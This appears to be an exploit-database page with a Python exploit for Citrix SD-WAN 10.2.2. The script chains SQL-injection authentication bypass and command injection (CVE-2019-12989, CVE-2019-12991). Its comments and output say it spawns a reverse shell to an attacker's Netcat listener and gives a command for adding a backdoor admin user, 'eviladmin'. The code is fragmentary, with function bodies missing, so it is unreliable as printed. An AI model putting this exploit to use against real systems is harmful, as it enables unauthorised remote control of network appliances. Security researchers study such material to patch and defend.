Exploits / Vulnerability Discovered : 2019-07-12 |
Type : webapps |
Platform : cgi
This exploit / vulnerability Citrix sdwan appliance 10.2.2 authentication bypass / remote command execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution
# Date: 2019-07-12
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.citrix.com
# Product: Citrix SD-WAN
# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/
# Version: Tested against 10.2.2
# Tested on:
# - Vendor-provided .OVA file
# CVE: CVE-2019-12989, CVE-2019-12991
# See Also:
# https://www.tenable.com/security/research/tra-2019-32
# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac
# https://support.citrix.com/article/CTX251987
# This code exploits both CVE-2019-12989 and CVE-2019-12991
# You'll need your own Netcat listener
import requests, urllib
import sys, os, argparse
import random
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# error is expected
expected = {"status":"fail","message":"Invalid value specified for site_name or appliance_type"}
if (r.status_code == 400 and r.json() == expected):
return token
return None
# Path to target app
base_url = 'https://' + args.t
# do sql injection to get a swc-token for auth bypass
token = do_sql_injection(base_url)
if (token is None):
err_and_exit('SQL injection failed.')
print 'SQL injection successful! Your swc-token is ' + str(token) + '.'
# if this worked, do the command injection
# create a new admin user and spawn a reverse shell
success = do_cmd_injection(base_url, token, args.ncip, args.ncport)
if success is False:
err_and_exit('Not so sure command injection worked. Expected a timeout.')
print 'Seems like command injection succeeded.'
print 'Check for your shell!\n'
print 'To add an admin web user, run this command: perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1'